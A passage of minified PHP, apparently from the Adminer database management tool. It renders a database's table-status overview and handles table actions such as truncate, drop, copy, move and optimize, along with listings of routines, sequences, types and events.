as$y=>$X){echo"<tr>","<th><code class='jush-".$x.($P?"status":"set")."'>".h($y)."</code>","<td>".nbsp($X);}echo"</table>\n";}}elseif(isset($_GET["script"])){header("Content-Type: text/javascript; charset=utf-8");if($_GET["script"]=="db"){$dh=array("Data_length"=>0,"Index_length"=>0,"Data_free"=>0);foreach(table_status()as$C=>$S){json_row("Comment-$C",nbsp($S["Comment"]));if(!is_view($S)){foreach(array("Engine","Collation")as$y)json_row("$y-$C",nbsp($S[$y]));foreach($dh+array("Auto_increment"=>0,"Rows"=>0)as$y=>$X){if($S[$y]!=""){$X=format_number($S[$y]);json_row("$y-$C",($y=="Rows"&&$X&&$S["Engine"]==($Tg=="pgsql"?"table":"InnoDB")?"~ $X":$X));if(isset($dh[$y]))$dh[$y]+=($S["Engine"]!="InnoDB"||$y!="Data_free"?$S[$y]:0);}elseif(array_key_exists($y,$S))json_row("$y-$C");}}}foreach($dh
as$y=>$X)json_row("sum-$y",format_number($X));json_row("");}elseif($_GET["script"]=="kill")$g->query("KILL ".number($_POST["kill"]));else{foreach(count_tables($b->databases())as$m=>$X){json_row("tables-$m",$X);json_row("size-$m",db_size($m));}json_row("");}exit;}else{$mh=array_merge((array)$_POST["tables"],(array)$_POST["views"]);if($mh&&!$n&&!$_POST["search"]){$I=true;$se="";if($x=="sql"&&count($_POST["tables"])>1&&($_POST["drop"]||$_POST["truncate"]||$_POST["copy"]))queries("SET foreign_key_checks = 0");if($_POST["truncate"]){if($_POST["tables"])$I=truncate_tables($_POST["tables"]);$se=lang(256);}elseif($_POST["move"]){$I=move_tables((array)$_POST["tables"],(array)$_POST["views"],$_POST["target"]);$se=lang(257);}elseif($_POST["copy"]){$I=copy_tables((array)$_POST["tables"],(array)$_POST["views"],$_POST["target"]);$se=lang(258);}elseif($_POST["drop"]){if($_POST["views"])$I=drop_views($_POST["views"]);if($I&&$_POST["tables"])$I=drop_tables($_POST["tables"]);$se=lang(259);}elseif($x!="sql"){$I=($x=="sqlite"?queries("VACUUM"):apply_queries("VACUUM".($_POST["optimize"]?"":" ANALYZE"),$_POST["tables"]));$se=lang(260);}elseif(!$_POST["tables"])$se=lang(9);elseif($I=queries(($_POST["optimize"]?"OPTIMIZE":($_POST["check"]?"CHECK":($_POST["repair"]?"REPAIR":"ANALYZE")))." TABLE ".implode(", ",array_map('idf_escape',$_POST["tables"])))){while($K=$I->fetch_assoc())$se.="<b>".h($K["Table"])."</b>: ".h($K["Msg_text"])."<br>";}queries_redirect(substr(ME,0,-1),$se,$I);}page_header(($_GET["ns"]==""?lang(35).": ".h(DB):lang(73).": ".h($_GET["ns"])),$n,true);if($b->homepage()){if($_GET["ns"]!==""){echo"<h3 id='tables-views'>".lang(261)."</h3>\n";$lh=tables_list();if(!$lh)echo"<p class='message'>".lang(9)."\n";else{echo"<form action='' method='post'>\n";if(support("table")){echo"<fieldset><legend>".lang(262)." <span id='selected2'></span></legend><div>","<input type='search' name='query' value='".h($_POST["query"])."'> <input type='submit' name='search' value='".lang(53)."'>\n","</div></fieldset>\n";if($_POST["search"]&&$_POST["query"]!="")search_tables();}$Vb=doc_link(array('sql'=>'show-table-status.html'));echo"<table cellspacing='0' class='nowrap checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);'>\n",'<thead><tr class="wrap"><td><input id="check-all" type="checkbox" onclick="formCheck(this, /^(tables|views)\[/);" class="jsonly">','<th>'.lang(123),'<td>'.lang(263).doc_link(array('sql'=>'storage-engines.html')),'<td>'.lang(114).doc_link(array('sql'=>'charset-mysql.html')),'<td>'.lang(264).$Vb,'<td>'.lang(265).$Vb,'<td>'.lang(266).$Vb,'<td>'.lang(48).doc_link(array('sql'=>'example-auto-increment.html')),'<td>'.lang(267).$Vb,(support("comment")?'<td>'.lang(47).$Vb:''),"</thead>\n";$T=0;foreach($lh
as$C=>$U){$ni=($U!==null&&!preg_match('~table~i',$U));$t=h("Table-".$C);echo'<tr'.odd().'><td>'.checkbox(($ni?"views[]":"tables[]"),$C,in_array($C,$mh,true),"","formUncheck('check-all');","",$t),'<th>'.(support("table")||support("indexes")?"<a href='".h(ME)."table=".urlencode($C)."' title='".lang(40)."' id='$t'>".h($C).'</a>':h($C));if($ni){echo'<td colspan="6"><a href="'.h(ME)."view=".urlencode($C).'" title="'.lang(41).'">'.(preg_match('~materialized~i',$U)?lang(121):lang(122)).'</a>','<td align="right"><a href="'.h(ME)."select=".urlencode($C).'" title="'.lang(39).'">?</a>';}else{foreach(array("Engine"=>array(),"Collation"=>array(),"Data_length"=>array("create",lang(42)),"Index_length"=>array("indexes",lang(125)),"Data_free"=>array("edit",lang(43)),"Auto_increment"=>array("auto_increment=1&create",lang(42)),"Rows"=>array("select",lang(39)),)as$y=>$_){$t=" id='$y-".h($C)."'";echo($_?"<td align='right'>".(support("table")||$y=="Rows"||(support("indexes")&&$y!="Data_length")?"<a href='".h(ME."$_[0]=").urlencode($C)."'$t title='$_[1]'>?</a>":"<span$t>?</span>"):"<td id='$y-".h($C)."'> ");}$T++;}echo(support("comment")?"<td id='Comment-".h($C)."'> ":"");}echo"<tr><td> <th>".lang(238,count($lh)),"<td>".nbsp($x=="sql"?$g->result("SELECT @@storage_engine"):""),"<td>".nbsp(db_collation(DB,collations()));foreach(array("Data_length","Index_length","Data_free")as$y)echo"<td align='right' id='sum-$y'> ";echo"</table>\n";if(!information_schema(DB)){$hi="<input type='submit' value='".lang(268)."'".on_help("'VACUUM'")."> ";$Ze="<input type='submit' name='optimize' value='".lang(269)."'".on_help($x=="sql"?"'OPTIMIZE TABLE'":"'VACUUM OPTIMIZE'")."> ";echo"<fieldset><legend>".lang(118)." <span id='selected'></span></legend><div>".($x=="sqlite"?$hi:($x=="pgsql"?$hi.$Ze:($x=="sql"?"<input type='submit' value='".lang(270)."'".on_help("'ANALYZE TABLE'")."> ".$Ze."<input type='submit' name='check' value='".lang(271)."'".on_help("'CHECK TABLE'")."> "."<input type='submit' name='repair' value='".lang(272)."'".on_help("'REPAIR TABLE'")."> ":"")))."<input type='submit' name='truncate' value='".lang(273)."'".confirm().on_help($x=="sqlite"?"'DELETE'":"'TRUNCATE".($x=="pgsql"?"'":" TABLE'"))."> "."<input type='submit' name='drop' value='".lang(119)."'".confirm().on_help("'DROP TABLE'").">\n";$l=(support("scheme")?$b->schemas():$b->databases());if(count($l)!=1&&$x!="sqlite"){$m=(isset($_POST["target"])?$_POST["target"]:(support("scheme")?$_GET["ns"]:DB));echo"<p>".lang(274).": ",($l?html_select("target",$l,$m):'<input name="target" value="'.h($m).'" autocapitalize="off">')," <input type='submit' name='move' value='".lang(275)."'>",(support("copy")?" <input type='submit' name='copy' value='".lang(276)."'>":""),"\n";}echo"<input type='hidden' name='all' value='' onclick=\"selectCount('selected', formChecked(this, /^(tables|views)\[/));".(support("table")?" selectCount('selected2', formChecked(this, /^tables\[/) || $T);":"")."\">\n";echo"<input type='hidden' name='token' value='$Dh'>\n","</div></fieldset>\n";}echo"</form>\n","<script type='text/javascript'>tableCheck();</script>\n";}echo'<p class="links"><a href="'.h(ME).'create=">'.lang(71)."</a>\n",(support("view")?'<a href="'.h(ME).'view=">'.lang(195)."</a>\n":"");if(support("routine")){echo"<h3 id='routines'>".lang(135)."</h3>\n";$tg=routines();if($tg){echo"<table cellspacing='0'>\n",'<thead><tr><th>'.lang(174).'<td>'.lang(46).'<td>'.lang(212)."<td> </thead>\n";odd('');foreach($tg
as$K){echo'<tr'.odd().'>','<th><a href="'.h(ME).($K["ROUTINE_TYPE"]!="PROCEDURE"?'callf=':'call=').urlencode($K["ROUTINE_NAME"]).'">'.h($K["ROUTINE_NAME"]).'</a>','<td>'.h($K["ROUTINE_TYPE"]),'<td>'.h($K["DTD_IDENTIFIER"]),'<td><a href="'.h(ME).($K["ROUTINE_TYPE"]!="PROCEDURE"?'function=':'procedure=').urlencode($K["ROUTINE_NAME"]).'">'.lang(128)."</a>";}echo"</table>\n";}echo'<p class="links">'.(support("procedure")?'<a href="'.h(ME).'procedure=">'.lang(211).'</a>':'').'<a href="'.h(ME).'function=">'.lang(210)."</a>\n";}if(support("sequence")){echo"<h3 id='sequences'>".lang(277)."</h3>\n";$Fg=get_vals("SELECT sequence_name FROM information_schema.sequences WHERE sequence_schema = current_schema() ORDER BY sequence_name");if($Fg){echo"<table cellspacing='0'>\n","<thead><tr><th>".lang(174)."</thead>\n";odd('');foreach($Fg
as$X)echo"<tr".odd()."><th><a href='".h(ME)."sequence=".urlencode($X)."'>".h($X)."</a>\n";echo"</table>\n";}echo"<p class='links'><a href='".h(ME)."sequence='>".lang(217)."</a>\n";}if(support("type")){echo"<h3 id='user-types'>".lang(24)."</h3>\n";$fi=types();if($fi){echo"<table cellspacing='0'>\n","<thead><tr><th>".lang(174)."</thead>\n";odd('');foreach($fi
as$X)echo"<tr".odd()."><th><a href='".h(ME)."type=".urlencode($X)."'>".h($X)."</a>\n";echo"</table>\n";}echo"<p class='links'><a href='".h(ME)."type='>".lang(221)."</a>\n";}if(support("event")){echo"<h3 id='events'>".lang(136)."</h3>\n";$L=get_rows("SHOW EVENTS");if($L){echo"<table cellspacing='0'>\n","<thead><tr><th>".lang(174)."<td>".lang(278)."<td>".lang(201)."<td>".lang(202)."<td></thead>\n";foreach($L
as$K){echo"<tr>","<th>".h($K["Name"]),"<td>".($K["Execute at"]?lang(279)."<td>".$K["Execute at"]:lang(203)." ".$K["Interval value"]." ".$K["Interval field"]."<td>$K[Starts]"),"<td>$K[Ends]",'<td><a href="'.h(ME).'event='.urlencode($K["Name"]).'">'.lang(128).'</a>';}echo"</table>\n";$uc=$g->result("SELECT @@event_scheduler");if($uc&&$uc!="ON")echo"<p class='error'><code class='jush-sqlset'>event_scheduler</code>: ".h($uc)."\n";}echo'<p class="links"><a href="'.h(ME).'event=">'.lang(200)."</a>\n";}if($lh)echo"<script type='text/javascript'>ajaxSetHtml('".js_escape(ME)."script=db');</script>\n";}}}page_footer();